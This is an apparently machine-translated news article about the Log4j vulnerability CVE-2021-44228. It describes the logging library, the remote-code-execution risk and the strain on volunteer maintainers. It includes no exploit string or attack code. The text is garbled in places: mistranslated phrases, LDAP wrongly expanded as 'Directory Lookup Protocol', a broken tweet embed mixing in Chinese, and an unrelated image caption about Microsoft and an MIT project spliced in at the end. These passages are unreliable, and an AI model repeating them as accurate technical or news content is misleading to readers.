Servers at risk for companies like Apple, Twitter, Steam, Tesla, and Oracle are all at risk
Source | TheNextWeb
Author 丨 Ivan Mehta
Compile the | Tech walkers
This article has been updated to include details about the latest Log4j releases, new exploit vectors, and the risks associated with all Java versions.
Just as the majority of racing enthusiasts watch verstappen and Hamilton's F1 championship battle, the majority of Internet companies are being frightened by a sudden incident.
The average user may not notice that Twitter, Facebook, Gmail, and other services we use on a daily basis are not out of business. But just recently, a bug in Log4j's open source technology caused panic in the global information security community.
The bug has affected billions of devices, and companies are scrambling to install fixes, while the open source community is aware of a deeper problem — where to find money to feed volunteers supporting open source projects like Log4j.
Before diving into so many complex topics, let's take a brief look at the background of Log4j technology and security issues.
What is Log4j?
Log4j 2 is an open source Java-based logging framework that is one of the Apache Foundation services that anyone can use for free. Many enterprises are using this logging software to track activity on their servers, even client applications.
For example, when we visit a website, the logger registers our IP address, browser and the pages we visit. With this data that is closely related to activities, businesses can address any issues that arise in their services.
Because the Log4j library is based on Java, the billions of devices supported by the framework could be put at risk by their security vulnerabilities.
What exactly is the bug in Log4j?
The vulnerability, which was last week listed as CVE-2021-44228, could allow an attacker to remotely execute code via specially crafted strings. Due to the extreme popularity of Log4j, cybercriminals can easily manipulate log strings and thus take control of the target server or client.
The main reason for this bug is that some versions of Log4j allow arbitrary text to be executed via the Directory Lookup Protocol (LDAP protocol).
Please note that this #log4j问题正令整个互联网陷入危机. And the key to all this is a simple passage "$Valsorda (@FiloSottile) December 10, 2021
![Microsoft's revision of the copyright statement of the original author of the MIT project caused controversy, and it turned out to be the fault of the automation script[fig]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)